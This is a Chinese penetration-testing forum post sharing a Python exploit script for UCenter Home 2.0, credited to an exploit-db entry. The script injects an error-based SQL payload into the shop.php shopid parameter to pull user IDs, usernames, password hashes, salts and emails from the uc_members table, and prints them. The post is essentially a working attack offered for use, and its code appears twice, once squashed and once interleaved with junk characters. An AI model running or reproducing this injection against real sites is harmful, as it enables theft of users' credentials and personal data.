找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2343|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
+ Y9 J4 F( b! L0 x: m; l+ z; n; y
& y+ ~. O+ B' S# S2 {# ?- k/ k
/ t( K8 x4 U7 d% D#!/usr/bin/env python  3 V+ k$ P; z& l# C. n4 @
( V) a, q& B" _2 T, M5 e1 L
import sys  
  y' H9 ~% ]* j. b0 Nimport urllib2  
; h1 H5 |" n/ r, _$ E6 F  y: W2 h) T' Zimport re  ) I, w4 ]7 ?8 ^/ h, ]7 G

3 C+ Z1 ~, o: h& q  u* K/ d$ x, e$ _def info():  5 B+ U4 ~9 d6 M; ~( @1 y
    print 'From:http://www.exploit-db.com/exploits/14997/'
* \3 D& Y$ h7 L- P% l    print 'http://www.hake.cc/Web_loudong/'
' f$ z3 B) h+ B    print 'changed:qiaoy'  ( D9 }8 a# G9 Y5 Q4 a2 l
    print 'exp:'  9 o6 e* M3 X* f8 g, B, i) W
    print ' ./UCenter_Home_2.0.py site'  
# @! k* w) p6 ]! P. W
9 L* p' }' `6 ?! Q* bdef main():  1 z7 o, v0 H8 t; b. y  J
    if len(sys.argv) != 2:  
. [. B3 i. G) C4 m; U; P        info()  
% q+ i- |( K( h% x2 Z8 q% h& Q" U    else:  8 d# p( E5 A6 u8 k2 M3 Y
        site = sys.argv[1]  4 M4 u  ?$ V1 A+ T( Y0 \% d
        if site[0:7] == 'http://':  # u( c$ o8 L; k. \1 j
            sitesite =site  
  [$ Y, d0 ], H, O        elif site[0:8] == 'https://':  4 l, l# @& Z+ I4 H1 d/ U: U
            sitesite = site  & X; P) c" L3 y/ b
        else:  
  L$ W* o  f0 Y* B& q# [) {1 R            site = 'http://'+site  ' _3 x* Y( A" W8 B1 s
        try:  
2 x9 k1 Y' J+ I' M            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  2 v, \7 L( Y8 f/ V+ e
            Value = urllib2.urlopen(url).read()  
9 i, R- ?0 A) j$ R            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  6 ]' w6 ?  T# I
            hacked = Msg.split(':')  6 B* _" a1 N. {0 A* [
            print 'Name:    '+hacked[1]  / T, e1 @- b' F. C
            print 'Passwd:  '+hacked[2]  - P4 ]2 i: N2 t* x. _8 Z
            print 'salt:    '+hacked[3]  
0 v5 _" M% O0 |! W/ }; V$ h            print 'email:   '+hacked[4]  
5 ^- v( q+ h; }4 c& b2 ^5 ?% X8 P        except:  ( t- F( k, W: v' b+ B* k
            print 'Sorry,I can\'t work............'    p+ V( h  [4 `$ p; r$ H4 a& V3 Y
. G3 S0 [. C- P5 k4 V; u) I: p8 |
if __name__ == '__main__':  - G6 x2 f" M* L
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表